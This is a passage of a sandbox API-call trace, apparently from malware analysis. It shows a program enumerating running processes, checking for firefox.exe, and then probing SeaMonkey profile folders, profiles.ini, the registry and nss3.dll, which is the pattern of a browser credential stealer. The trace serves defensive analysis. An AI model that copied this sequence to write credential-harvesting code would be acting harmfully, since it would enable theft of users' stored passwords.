returned="C:\\Windows\\System32\\svchost.exe" [0255.004] GetProcessTimes (in: hProcess=0x21c, lpCreationTime=0x19bca0, lpExitTime=0x19bca8, lpKernelTime=0x19bcb0, lpUserTime=0x19bcb8 | out: lpCreationTime=0x19bca0, lpExitTime=0x19bca8, lpKernelTime=0x19bcb0, lpUserTime=0x19bcb8) returned 1 [0255.004] CloseHandle (hObject=0x21c) returned 1 [0255.004] Process32NextW (in: hSnapshot=0x220, lppe=0x19b860 | out: lppe=0x19b860*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x404, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x1e0, pcPriClassBase=8, dwFlags=0x0, szExeFile="spoolsv.exe")) returned 1 [0255.004] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0x404) returned 0x21c [0255.005] GetModuleFileNameExW (in: hProcess=0x21c, hModule=0x0, lpFilename=0x19b654, nSize=0x104 | out: lpFilename="C:\\Windows\\System32\\spoolsv.exe" (normalized: "c:\\windows\\system32\\spoolsv.exe")) returned 0x1f [0255.005] wcscpy (in: _Dest=0x19ba90, _Source="C:\\Windows\\System32\\spoolsv.exe" | out: _Dest="C:\\Windows\\System32\\spoolsv.exe") returned="C:\\Windows\\System32\\spoolsv.exe" [0255.005] GetProcessTimes (in: hProcess=0x21c, lpCreationTime=0x19bca0, lpExitTime=0x19bca8, lpKernelTime=0x19bcb0, lpUserTime=0x19bcb8 | out: lpCreationTime=0x19bca0, lpExitTime=0x19bca8, lpKernelTime=0x19bcb0, lpUserTime=0x19bcb8) returned 1 [0255.005] CloseHandle (hObject=0x21c) returned 1 [0255.005] Process32NextW (in: hSnapshot=0x220, lppe=0x19b860 | out: lppe=0x19b860*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x470, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x1e0, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0255.005] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0x470) returned 0x21c [0255.005] GetModuleFileNameExW (in: hProcess=0x21c, hModule=0x0, lpFilename=0x19b654, nSize=0x104 | out: lpFilename="C:\\Windows\\System32\\svchost.exe" (normalized: "c:\\windows\\system32\\svchost.exe")) returned 0x1f [0255.005] wcscpy (in: _Dest=0x19ba90, _Source="C:\\Windows\\System32\\svchost.exe" | out: _Dest="C:\\Windows\\System32\\svchost.exe") returned="C:\\Windows\\System32\\svchost.exe" [0255.005] GetProcessTimes (in: hProcess=0x21c, lpCreationTime=0x19bca0, lpExitTime=0x19bca8, lpKernelTime=0x19bcb0, lpUserTime=0x19bcb8 | out: lpCreationTime=0x19bca0, lpExitTime=0x19bca8, lpKernelTime=0x19bcb0, lpUserTime=0x19bcb8) returned 1 [0255.005] CloseHandle (hObject=0x21c) returned 1 [0255.005] Process32NextW (in: hSnapshot=0x220, lppe=0x19b860 | out: lppe=0x19b860*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x480, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1b, th32ParentProcessID=0x1e0, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0255.006] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0x480) returned 0x21c [0255.006] GetModuleFileNameExW (in: hProcess=0x21c, hModule=0x0, lpFilename=0x19b654, nSize=0x104 | out: lpFilename="C:\\Windows\\System32\\svchost.exe" (normalized: "c:\\windows\\system32\\svchost.exe")) returned 0x1f [0255.006] wcscpy (in: _Dest=0x19ba90, _Source="C:\\Windows\\System32\\svchost.exe" | out: _Dest="C:\\Windows\\System32\\svchost.exe") returned="C:\\Windows\\System32\\svchost.exe" [0255.006] GetProcessTimes (in: hProcess=0x21c, lpCreationTime=0x19bca0, lpExitTime=0x19bca8, lpKernelTime=0x19bcb0, lpUserTime=0x19bcb8 | out: lpCreationTime=0x19bca0, lpExitTime=0x19bca8, lpKernelTime=0x19bcb0, lpUserTime=0x19bcb8) returned 1 [0255.006] CloseHandle (hObject=0x21c) returned 1 [0255.006] Process32NextW (in: hSnapshot=0x220, lppe=0x19b860 | out: lppe=0x19b860*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x560, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x15, th32ParentProcessID=0x1e0, pcPriClassBase=8, dwFlags=0x0, szExeFile="OfficeClickToRun.exe")) returned 1 [0255.007] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0x560) returned 0x21c [0255.007] GetModuleFileNameExW (in: hProcess=0x21c, hModule=0x0, lpFilename=0x19b654, nSize=0x104 | out: lpFilename="C:\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\OfficeClickToRun.exe" (normalized: "c:\\program files\\common files\\microsoft shared\\clicktorun\\officeclicktorun.exe")) returned 0x4e [0255.007] wcscpy (in: _Dest=0x19ba90, _Source="C:\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\OfficeClickToRun.exe" | out: _Dest="C:\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\OfficeClickToRun.exe") returned="C:\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\OfficeClickToRun.exe" [0255.007] GetProcessTimes (in: hProcess=0x21c, lpCreationTime=0x19bca0, lpExitTime=0x19bca8, lpKernelTime=0x19bcb0, lpUserTime=0x19bcb8 | out: lpCreationTime=0x19bca0, lpExitTime=0x19bca8, lpKernelTime=0x19bcb0, lpUserTime=0x19bcb8) returned 1 [0255.007] CloseHandle (hObject=0x21c) returned 1 [0255.007] Process32NextW (in: hSnapshot=0x220, lppe=0x19b860 | out: lppe=0x19b860*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x5a4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x1e0, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0255.007] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0x5a4) returned 0x21c [0255.007] GetModuleFileNameExW (in: hProcess=0x21c, hModule=0x0, lpFilename=0x19b654, nSize=0x104 | out: lpFilename="C:\\Windows\\System32\\svchost.exe" (normalized: "c:\\windows\\system32\\svchost.exe")) returned 0x1f [0255.007] wcscpy (in: _Dest=0x19ba90, _Source="C:\\Windows\\System32\\svchost.exe" | out: _Dest="C:\\Windows\\System32\\svchost.exe") returned="C:\\Windows\\System32\\svchost.exe" [0255.008] GetProcessTimes (in: hProcess=0x21c, lpCreationTime=0x19bca0, lpExitTime=0x19bca8, lpKernelTime=0x19bcb0, lpUserTime=0x19bcb8 | out: lpCreationTime=0x19bca0, lpExitTime=0x19bca8, lpKernelTime=0x19bcb0, lpUserTime=0x19bcb8) returned 1 [0255.008] CloseHandle (hObject=0x21c) returned 1 [0255.008] Process32NextW (in: hSnapshot=0x220, lppe=0x19b860 | out: lppe=0x19b860*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x6cc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x10, th32ParentProcessID=0x500, pcPriClassBase=13, dwFlags=0x0, szExeFile="indexerneutral.exe")) returned 1 [0255.008] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0x6cc) returned 0x21c [0255.008] GetModuleFileNameExW (in: hProcess=0x21c, hModule=0x0, lpFilename=0x19b654, nSize=0x104 | out: lpFilename="C:\\Windows\\SysWOW64\\indexerneutral.exe" (normalized: "c:\\windows\\syswow64\\indexerneutral.exe")) returned 0x26 [0255.008] wcscpy (in: _Dest=0x19ba90, _Source="C:\\Windows\\SysWOW64\\indexerneutral.exe" | out: _Dest="C:\\Windows\\SysWOW64\\indexerneutral.exe") returned="C:\\Windows\\SysWOW64\\indexerneutral.exe" [0255.008] GetProcessTimes (in: hProcess=0x21c, lpCreationTime=0x19bca0, lpExitTime=0x19bca8, lpKernelTime=0x19bcb0, lpUserTime=0x19bcb8 | out: lpCreationTime=0x19bca0, lpExitTime=0x19bca8, lpKernelTime=0x19bcb0, lpUserTime=0x19bcb8) returned 1 [0255.008] CloseHandle (hObject=0x21c) returned 1 [0255.008] Process32NextW (in: hSnapshot=0x220, lppe=0x19b860 | out: lppe=0x19b860*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x7e0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x6cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="indexerneutral.exe")) returned 1 [0255.009] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0x7e0) returned 0x21c [0255.009] GetModuleFileNameExW (in: hProcess=0x21c, hModule=0x0, lpFilename=0x19b654, nSize=0x104 | out: lpFilename="C:\\Windows\\SysWOW64\\indexerneutral.exe" (normalized: "c:\\windows\\syswow64\\indexerneutral.exe")) returned 0x26 [0255.009] wcscpy (in: _Dest=0x19ba90, _Source="C:\\Windows\\SysWOW64\\indexerneutral.exe" | out: _Dest="C:\\Windows\\SysWOW64\\indexerneutral.exe") returned="C:\\Windows\\SysWOW64\\indexerneutral.exe" [0255.009] GetProcessTimes (in: hProcess=0x21c, lpCreationTime=0x19bca0, lpExitTime=0x19bca8, lpKernelTime=0x19bcb0, lpUserTime=0x19bcb8 | out: lpCreationTime=0x19bca0, lpExitTime=0x19bca8, lpKernelTime=0x19bcb0, lpUserTime=0x19bcb8) returned 1 [0255.009] CloseHandle (hObject=0x21c) returned 1 [0255.009] Process32NextW (in: hSnapshot=0x220, lppe=0x19b860 | out: lppe=0x19b860*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x7f0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x6cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="indexerneutral.exe")) returned 1 [0255.009] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0x7f0) returned 0x21c [0255.009] GetModuleFileNameExW (in: hProcess=0x21c, hModule=0x0, lpFilename=0x19b654, nSize=0x104 | out: lpFilename="C:\\Windows\\SysWOW64\\indexerneutral.exe" (normalized: "c:\\windows\\syswow64\\indexerneutral.exe")) returned 0x26 [0255.010] wcscpy (in: _Dest=0x19ba90, _Source="C:\\Windows\\SysWOW64\\indexerneutral.exe" | out: _Dest="C:\\Windows\\SysWOW64\\indexerneutral.exe") returned="C:\\Windows\\SysWOW64\\indexerneutral.exe" [0255.010] GetProcessTimes (in: hProcess=0x21c, lpCreationTime=0x19bca0, lpExitTime=0x19bca8, lpKernelTime=0x19bcb0, lpUserTime=0x19bcb8 | out: lpCreationTime=0x19bca0, lpExitTime=0x19bca8, lpKernelTime=0x19bcb0, lpUserTime=0x19bcb8) returned 1 [0255.010] CloseHandle (hObject=0x21c) returned 1 [0255.010] Process32NextW (in: hSnapshot=0x220, lppe=0x19b860 | out: lppe=0x19b860*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4ec, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x6cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="indexerneutrala.exe")) returned 1 [0255.010] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0x4ec) returned 0x21c [0255.010] GetModuleFileNameExW (in: hProcess=0x21c, hModule=0x0, lpFilename=0x19b654, nSize=0x104 | out: lpFilename="C:\\Windows\\SysWOW64\\indexerneutrala.exe" (normalized: "c:\\windows\\syswow64\\indexerneutrala.exe")) returned 0x27 [0255.010] wcscpy (in: _Dest=0x19ba90, _Source="C:\\Windows\\SysWOW64\\indexerneutrala.exe" | out: _Dest="C:\\Windows\\SysWOW64\\indexerneutrala.exe") returned="C:\\Windows\\SysWOW64\\indexerneutrala.exe" [0255.010] GetProcessTimes (in: hProcess=0x21c, lpCreationTime=0x19bca0, lpExitTime=0x19bca8, lpKernelTime=0x19bcb0, lpUserTime=0x19bcb8 | out: lpCreationTime=0x19bca0, lpExitTime=0x19bca8, lpKernelTime=0x19bcb0, lpUserTime=0x19bcb8) returned 1 [0255.010] CloseHandle (hObject=0x21c) returned 1 [0255.010] Process32NextW (in: hSnapshot=0x220, lppe=0x19b860 | out: lppe=0x19b860*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x538, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x6cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="indexerneutralb.exe")) returned 1 [0255.011] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0x538) returned 0x21c [0255.011] GetModuleFileNameExW (in: hProcess=0x21c, hModule=0x0, lpFilename=0x19b654, nSize=0x104 | out: lpFilename="C:\\Windows\\SysWOW64\\indexerneutralb.exe" (normalized: "c:\\windows\\syswow64\\indexerneutralb.exe")) returned 0x27 [0255.011] wcscpy (in: _Dest=0x19ba90, _Source="C:\\Windows\\SysWOW64\\indexerneutralb.exe" | out: _Dest="C:\\Windows\\SysWOW64\\indexerneutralb.exe") returned="C:\\Windows\\SysWOW64\\indexerneutralb.exe" [0255.011] GetProcessTimes (in: hProcess=0x21c, lpCreationTime=0x19bca0, lpExitTime=0x19bca8, lpKernelTime=0x19bcb0, lpUserTime=0x19bcb8 | out: lpCreationTime=0x19bca0, lpExitTime=0x19bca8, lpKernelTime=0x19bcb0, lpUserTime=0x19bcb8) returned 1 [0255.011] CloseHandle (hObject=0x21c) returned 1 [0255.011] Process32NextW (in: hSnapshot=0x220, lppe=0x19b860 | out: lppe=0x19b860*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x538, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x6cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="indexerneutralb.exe")) returned 0 [0255.012] CloseHandle (hObject=0x220) returned 1 [0255.012] _wcsicmp (_String1="", _String2="firefox.exe") returned -102 [0255.012] _wcsicmp (_String1="", _String2="firefox.exe") returned -102 [0255.012] _wcsicmp (_String1="", _String2="firefox.exe") returned -102 [0255.012] _wcsicmp (_String1="", _String2="firefox.exe") returned -102 [0255.012] _wcsicmp (_String1="", _String2="firefox.exe") returned -102 [0255.012] _wcsicmp (_String1="", _String2="firefox.exe") returned -102 [0255.012] _wcsicmp (_String1="", _String2="firefox.exe") returned -102 [0255.012] _wcsicmp (_String1="", _String2="firefox.exe") returned -102 [0255.012] _wcsicmp (_String1="", _String2="firefox.exe") returned -102 [0255.012] _wcsicmp (_String1="", _String2="firefox.exe") returned -102 [0255.012] _wcsicmp (_String1="C:\\Windows\\System32\\winlogon.exe", _String2="firefox.exe") returned -3 [0255.012] _wcsicmp (_String1="winlogon.exe", _String2="firefox.exe") returned 17 [0255.012] _wcsicmp (_String1="", _String2="firefox.exe") returned -102 [0255.012] _wcsicmp (_String1="", _String2="firefox.exe") returned -102 [0255.012] _wcsicmp (_String1="C:\\Windows\\System32\\lsass.exe", _String2="firefox.exe") returned -3 [0255.012] _wcsicmp (_String1="lsass.exe", _String2="firefox.exe") returned 6 [0255.012] _wcsicmp (_String1="C:\\Windows\\System32\\svchost.exe", _String2="firefox.exe") returned -3 [0255.012] _wcsicmp (_String1="svchost.exe", _String2="firefox.exe") returned 13 [0255.012] _wcsicmp (_String1="C:\\Windows\\System32\\svchost.exe", _String2="firefox.exe") returned -3 [0255.012] _wcsicmp (_String1="svchost.exe", _String2="firefox.exe") returned 13 [0255.012] _wcsicmp (_String1="C:\\Windows\\System32\\LogonUI.exe", _String2="firefox.exe") returned -3 [0255.012] _wcsicmp (_String1="LogonUI.exe", _String2="firefox.exe") returned 6 [0255.012] _wcsicmp (_String1="C:\\Windows\\System32\\dwm.exe", _String2="firefox.exe") returned -3 [0255.012] _wcsicmp (_String1="dwm.exe", _String2="firefox.exe") returned -2 [0255.012] _wcsicmp (_String1="C:\\Windows\\System32\\svchost.exe", _String2="firefox.exe") returned -3 [0255.012] _wcsicmp (_String1="svchost.exe", _String2="firefox.exe") returned 13 [0255.012] _wcsicmp (_String1="C:\\Windows\\System32\\svchost.exe", _String2="firefox.exe") returned -3 [0255.012] _wcsicmp (_String1="svchost.exe", _String2="firefox.exe") returned 13 [0255.012] _wcsicmp (_String1="C:\\Windows\\System32\\svchost.exe", _String2="firefox.exe") returned -3 [0255.012] _wcsicmp (_String1="svchost.exe", _String2="firefox.exe") returned 13 [0255.012] _wcsicmp (_String1="C:\\Windows\\System32\\svchost.exe", _String2="firefox.exe") returned -3 [0255.012] _wcsicmp (_String1="svchost.exe", _String2="firefox.exe") returned 13 [0255.012] _wcsicmp (_String1="C:\\Windows\\System32\\svchost.exe", _String2="firefox.exe") returned -3 [0255.012] _wcsicmp (_String1="svchost.exe", _String2="firefox.exe") returned 13 [0255.012] _wcsicmp (_String1="C:\\Windows\\System32\\svchost.exe", _String2="firefox.exe") returned -3 [0255.012] _wcsicmp (_String1="svchost.exe", _String2="firefox.exe") returned 13 [0255.012] _wcsicmp (_String1="C:\\Windows\\System32\\spoolsv.exe", _String2="firefox.exe") returned -3 [0255.012] _wcsicmp (_String1="spoolsv.exe", _String2="firefox.exe") returned 13 [0255.012] _wcsicmp (_String1="C:\\Windows\\System32\\svchost.exe", _String2="firefox.exe") returned -3 [0255.012] _wcsicmp (_String1="svchost.exe", _String2="firefox.exe") returned 13 [0255.013] _wcsicmp (_String1="C:\\Windows\\System32\\svchost.exe", _String2="firefox.exe") returned -3 [0255.013] _wcsicmp (_String1="svchost.exe", _String2="firefox.exe") returned 13 [0255.013] _wcsicmp (_String1="C:\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\OfficeClickToRun.exe", _String2="firefox.exe") returned -3 [0255.013] _wcsicmp (_String1="OfficeClickToRun.exe", _String2="firefox.exe") returned 9 [0255.013] _wcsicmp (_String1="C:\\Windows\\System32\\svchost.exe", _String2="firefox.exe") returned -3 [0255.013] _wcsicmp (_String1="svchost.exe", _String2="firefox.exe") returned 13 [0255.013] _wcsicmp (_String1="C:\\Windows\\SysWOW64\\indexerneutral.exe", _String2="firefox.exe") returned -3 [0255.013] _wcsicmp (_String1="indexerneutral.exe", _String2="firefox.exe") returned 3 [0255.013] _wcsicmp (_String1="C:\\Windows\\SysWOW64\\indexerneutral.exe", _String2="firefox.exe") returned -3 [0255.013] _wcsicmp (_String1="indexerneutral.exe", _String2="firefox.exe") returned 3 [0255.013] _wcsicmp (_String1="C:\\Windows\\SysWOW64\\indexerneutral.exe", _String2="firefox.exe") returned -3 [0255.013] _wcsicmp (_String1="indexerneutral.exe", _String2="firefox.exe") returned 3 [0255.013] _wcsicmp (_String1="C:\\Windows\\SysWOW64\\indexerneutrala.exe", _String2="firefox.exe") returned -3 [0255.013] _wcsicmp (_String1="indexerneutrala.exe", _String2="firefox.exe") returned 3 [0255.013] _wcsicmp (_String1="C:\\Windows\\SysWOW64\\indexerneutralb.exe", _String2="firefox.exe") returned -3 [0255.013] _wcsicmp (_String1="indexerneutralb.exe", _String2="firefox.exe") returned 3 [0255.013] FreeLibrary (hLibModule=0x766e0000) returned 1 [0255.013] SHGetSpecialFolderPathW (in: hwnd=0x0, pszPath=0x19ba98, csidl=26, fCreate=0 | out: pszPath="C:\\Windows\\system32\\config\\systemprofile\\AppData\\Roaming") returned 1 [0255.014] SHGetSpecialFolderPathW (in: hwnd=0x0, pszPath=0x19b258, csidl=28, fCreate=0 | out: pszPath="C:\\Windows\\system32\\config\\systemprofile\\AppData\\Local") returned 1 [0255.014] wcslen (_String="Mozilla\\SeaMonkey\\Profiles") returned 0x1a [0255.014] wcslen (_String="C:\\Windows\\system32\\config\\systemprofile\\AppData\\Roaming") returned 0x38 [0255.014] wcscpy (in: _Dest=0x19b888, _Source="C:\\Windows\\system32\\config\\systemprofile\\AppData\\Roaming" | out: _Dest="C:\\Windows\\system32\\config\\systemprofile\\AppData\\Roaming") returned="C:\\Windows\\system32\\config\\systemprofile\\AppData\\Roaming" [0255.014] wcslen (_String="C:\\Windows\\system32\\config\\systemprofile\\AppData\\Roaming") returned 0x38 [0255.014] wcscat (in: _Dest=0x19b888, _Source="\\" | out: _Dest="C:\\Windows\\system32\\config\\systemprofile\\AppData\\Roaming\\") returned="C:\\Windows\\system32\\config\\systemprofile\\AppData\\Roaming\\" [0255.014] wcscat (in: _Dest=0x19b888, _Source="Mozilla\\SeaMonkey\\Profiles" | out: _Dest="C:\\Windows\\system32\\config\\systemprofile\\AppData\\Roaming\\Mozilla\\SeaMonkey\\Profiles") returned="C:\\Windows\\system32\\config\\systemprofile\\AppData\\Roaming\\Mozilla\\SeaMonkey\\Profiles" [0255.014] wcslen (_String="Mozilla\\SeaMonkey\\Profiles") returned 0x1a [0255.014] wcslen (_String="C:\\Windows\\system32\\config\\systemprofile\\AppData\\Local") returned 0x36 [0255.014] wcscpy (in: _Dest=0x19b678, _Source="C:\\Windows\\system32\\config\\systemprofile\\AppData\\Local" | out: _Dest="C:\\Windows\\system32\\config\\systemprofile\\AppData\\Local") returned="C:\\Windows\\system32\\config\\systemprofile\\AppData\\Local" [0255.014] wcslen (_String="C:\\Windows\\system32\\config\\systemprofile\\AppData\\Local") returned 0x36 [0255.014] wcscat (in: _Dest=0x19b678, _Source="\\" | out: _Dest="C:\\Windows\\system32\\config\\systemprofile\\AppData\\Local\\") returned="C:\\Windows\\system32\\config\\systemprofile\\AppData\\Local\\" [0255.014] wcscat (in: _Dest=0x19b678, _Source="Mozilla\\SeaMonkey\\Profiles" | out: _Dest="C:\\Windows\\system32\\config\\systemprofile\\AppData\\Local\\Mozilla\\SeaMonkey\\Profiles") returned="C:\\Windows\\system32\\config\\systemprofile\\AppData\\Local\\Mozilla\\SeaMonkey\\Profiles" [0255.014] wcslen (_String="Mozilla\\SeaMonkey") returned 0x11 [0255.014] wcslen (_String="C:\\Windows\\system32\\config\\systemprofile\\AppData\\Roaming") returned 0x38 [0255.014] wcscpy (in: _Dest=0x19b468, _Source="C:\\Windows\\system32\\config\\systemprofile\\AppData\\Roaming" | out: _Dest="C:\\Windows\\system32\\config\\systemprofile\\AppData\\Roaming") returned="C:\\Windows\\system32\\config\\systemprofile\\AppData\\Roaming" [0255.014] wcslen (_String="C:\\Windows\\system32\\config\\systemprofile\\AppData\\Roaming") returned 0x38 [0255.014] wcscat (in: _Dest=0x19b468, _Source="\\" | out: _Dest="C:\\Windows\\system32\\config\\systemprofile\\AppData\\Roaming\\") returned="C:\\Windows\\system32\\config\\systemprofile\\AppData\\Roaming\\" [0255.014] wcscat (in: _Dest=0x19b468, _Source="Mozilla\\SeaMonkey" | out: _Dest="C:\\Windows\\system32\\config\\systemprofile\\AppData\\Roaming\\Mozilla\\SeaMonkey") returned="C:\\Windows\\system32\\config\\systemprofile\\AppData\\Roaming\\Mozilla\\SeaMonkey" [0255.014] wcslen (_String="C:\\Windows\\system32\\config\\systemprofile\\AppData\\Roaming\\Mozilla\\SeaMonkey\\Profiles") returned 0x53 [0255.014] wcslen (_String="C:\\Windows\\system32\\config\\systemprofile\\AppData\\Roaming\\Mozilla\\SeaMonkey\\Profiles") returned 0x53 [0255.014] wcslen (_String="*.*") returned 0x3 [0255.014] wcscpy (in: _Dest=0x19a63c, _Source="C:\\Windows\\system32\\config\\systemprofile\\AppData\\Roaming\\Mozilla\\SeaMonkey\\Profiles" | out: _Dest="C:\\Windows\\system32\\config\\systemprofile\\AppData\\Roaming\\Mozilla\\SeaMonkey\\Profiles") returned="C:\\Windows\\system32\\config\\systemprofile\\AppData\\Roaming\\Mozilla\\SeaMonkey\\Profiles" [0255.014] wcslen (_String="C:\\Windows\\system32\\config\\systemprofile\\AppData\\Roaming\\Mozilla\\SeaMonkey\\Profiles") returned 0x53 [0255.014] wcscat (in: _Dest=0x19a63c, _Source="\\" | out: _Dest="C:\\Windows\\system32\\config\\systemprofile\\AppData\\Roaming\\Mozilla\\SeaMonkey\\Profiles\\") returned="C:\\Windows\\system32\\config\\systemprofile\\AppData\\Roaming\\Mozilla\\SeaMonkey\\Profiles\\" [0255.014] wcscat (in: _Dest=0x19a63c, _Source="*.*" | out: _Dest="C:\\Windows\\system32\\config\\systemprofile\\AppData\\Roaming\\Mozilla\\SeaMonkey\\Profiles\\*.*") returned="C:\\Windows\\system32\\config\\systemprofile\\AppData\\Roaming\\Mozilla\\SeaMonkey\\Profiles\\*.*" [0255.014] FindFirstFileW (in: lpFileName="C:\\Windows\\system32\\config\\systemprofile\\AppData\\Roaming\\Mozilla\\SeaMonkey\\Profiles\\*.*", lpFindFileData=0x19a8c4 | out: lpFindFileData=0x19a8c4) returned 0xffffffff [0255.014] wcslen (_String="C:\\Windows\\system32\\config\\systemprofile\\AppData\\Local\\Mozilla\\SeaMonkey\\Profiles") returned 0x51 [0255.014] wcslen (_String="C:\\Windows\\system32\\config\\systemprofile\\AppData\\Local\\Mozilla\\SeaMonkey\\Profiles") returned 0x51 [0255.014] wcslen (_String="*.*") returned 0x3 [0255.014] wcscpy (in: _Dest=0x19a63c, _Source="C:\\Windows\\system32\\config\\systemprofile\\AppData\\Local\\Mozilla\\SeaMonkey\\Profiles" | out: _Dest="C:\\Windows\\system32\\config\\systemprofile\\AppData\\Local\\Mozilla\\SeaMonkey\\Profiles") returned="C:\\Windows\\system32\\config\\systemprofile\\AppData\\Local\\Mozilla\\SeaMonkey\\Profiles" [0255.014] wcslen (_String="C:\\Windows\\system32\\config\\systemprofile\\AppData\\Local\\Mozilla\\SeaMonkey\\Profiles") returned 0x51 [0255.014] wcscat (in: _Dest=0x19a63c, _Source="\\" | out: _Dest="C:\\Windows\\system32\\config\\systemprofile\\AppData\\Local\\Mozilla\\SeaMonkey\\Profiles\\") returned="C:\\Windows\\system32\\config\\systemprofile\\AppData\\Local\\Mozilla\\SeaMonkey\\Profiles\\" [0255.014] wcscat (in: _Dest=0x19a63c, _Source="*.*" | out: _Dest="C:\\Windows\\system32\\config\\systemprofile\\AppData\\Local\\Mozilla\\SeaMonkey\\Profiles\\*.*") returned="C:\\Windows\\system32\\config\\systemprofile\\AppData\\Local\\Mozilla\\SeaMonkey\\Profiles\\*.*" [0255.014] FindFirstFileW (in: lpFileName="C:\\Windows\\system32\\config\\systemprofile\\AppData\\Local\\Mozilla\\SeaMonkey\\Profiles\\*.*", lpFindFileData=0x19a8c4 | out: lpFindFileData=0x19a8c4) returned 0xffffffff [0255.015] wcslen (_String="C:\\Windows\\system32\\config\\systemprofile\\AppData\\Roaming\\Mozilla\\SeaMonkey") returned 0x4a [0255.015] wcslen (_String="profiles.ini") returned 0xc [0255.015] wcscpy (in: _Dest=0x19a5ec, _Source="C:\\Windows\\system32\\config\\systemprofile\\AppData\\Roaming\\Mozilla\\SeaMonkey" | out: _Dest="C:\\Windows\\system32\\config\\systemprofile\\AppData\\Roaming\\Mozilla\\SeaMonkey") returned="C:\\Windows\\system32\\config\\systemprofile\\AppData\\Roaming\\Mozilla\\SeaMonkey" [0255.015] wcslen (_String="C:\\Windows\\system32\\config\\systemprofile\\AppData\\Roaming\\Mozilla\\SeaMonkey") returned 0x4a [0255.015] wcscat (in: _Dest=0x19a5ec, _Source="\\" | out: _Dest="C:\\Windows\\system32\\config\\systemprofile\\AppData\\Roaming\\Mozilla\\SeaMonkey\\") returned="C:\\Windows\\system32\\config\\systemprofile\\AppData\\Roaming\\Mozilla\\SeaMonkey\\" [0255.015] wcscat (in: _Dest=0x19a5ec, _Source="profiles.ini" | out: _Dest="C:\\Windows\\system32\\config\\systemprofile\\AppData\\Roaming\\Mozilla\\SeaMonkey\\profiles.ini") returned="C:\\Windows\\system32\\config\\systemprofile\\AppData\\Roaming\\Mozilla\\SeaMonkey\\profiles.ini" [0255.015] GetFileAttributesW (lpFileName="C:\\Windows\\system32\\config\\systemprofile\\AppData\\Roaming\\Mozilla\\SeaMonkey\\profiles.ini" (normalized: "c:\\windows\\system32\\config\\systemprofile\\appdata\\roaming\\mozilla\\seamonkey\\profiles.ini")) returned 0xffffffff [0255.015] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\App Paths\\seamonkey.exe", ulOptions=0x0, samDesired=0x20019, phkResult=0x19bcc0 | out: phkResult=0x19bcc0*=0x0) returned 0x2 [0255.015] ExpandEnvironmentStringsW (in: lpSrc="%programfiles%\\Sea Monkey", lpDst=0x19cf18, nSize=0x104 | out: lpDst="C:\\Program Files (x86)\\Sea Monkey") returned 0x22 [0255.015] wcslen (_String="C:\\Program Files (x86)\\Sea Monkey") returned 0x21 [0255.015] wcslen (_String="nss3.dll") returned 0x8 [0255.015] wcscpy (in: _Dest=0x19bab8, _Source="C:\\Program Files (x86)\\Sea Monkey" | out: _Dest="C:\\Program Files (x86)\\Sea Monkey") returned="C:\\Program Files (x86)\\Sea Monkey" [0255.015] wcslen (_String="C:\\Program Files (x86)\\Sea Monkey") returned 0x21 [0255.015] wcscat (in: _Dest=0x19bab8, _Source="\\" | out: _Dest="C:\\Program Files (x86)\\Sea Monkey\\") returned="C:\\Program Files (x86)\\Sea Monkey\\" [0255.015] wcscat (in: _Dest=0x19bab8, _Source="nss3.dll" | out: _Dest="C:\\Program Files (x86)\\Sea Monkey\\nss3.dll") returned="C:\\Program Files (x86)\\Sea Monkey\\nss3.dll" [0255.015] GetFileAttributesW (lpFileName="C:\\Program Files (x86)\\Sea Monkey\\nss3.dll" (normalized: "c:\\program files (x86)\\sea monkey\\nss3.dll")) returned 0xffffffff [0255.015] SHGetSpecialFolderPathW (in: hwnd=0x0, 